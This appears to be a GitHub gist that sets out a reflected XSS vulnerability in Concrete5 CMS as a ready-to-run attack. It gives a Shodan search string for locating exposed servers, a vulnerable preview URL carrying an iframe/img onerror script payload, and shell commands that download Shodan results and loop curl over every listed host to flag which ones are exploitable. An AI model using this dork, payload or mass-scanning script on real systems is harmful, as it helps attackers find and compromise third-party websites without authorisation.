Created
January 6, 2022 14:38
-
-
Save simrotion13/1ee0b0573d6e43f0f0e5cf38d4600d50 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Concrete5 CMS XSS vulnerability tweet by Jackson | |
| Shodan Dork : 'Set-Cookie: CONCRETE5' | |
| Vulnerable URL : | |
| https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)> | |
| By using below URL we can download the results. ( Shodan Premium API Key is needed ) | |
| shodan download concrete5 'Set-Cookie: CONCRETE5' | |
| I already downlaod the results using shodan cli command | |
| We will seperate the IP:PORT from shodan results. For this we will use shodan parse command along with awk | |
| shodan parse concrete5.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a shodan-ip.txt | |
| We will using below process to automate the findings | |
| cat shodan-ip.txt | while read host do ; do curl --silent --path-as-is --insecure "https://$host/ccm/system/panels/page/preview_as_user/preview?cID=%22%3E%3C/iframe%3E%3Cimg/src/onerror=.1|alert(document.domain)%3E" | grep -qs '"></iframe><img/src/onerror=.1|alert(document.domain)>' && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done | |
| Check the Vulnerable URL |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment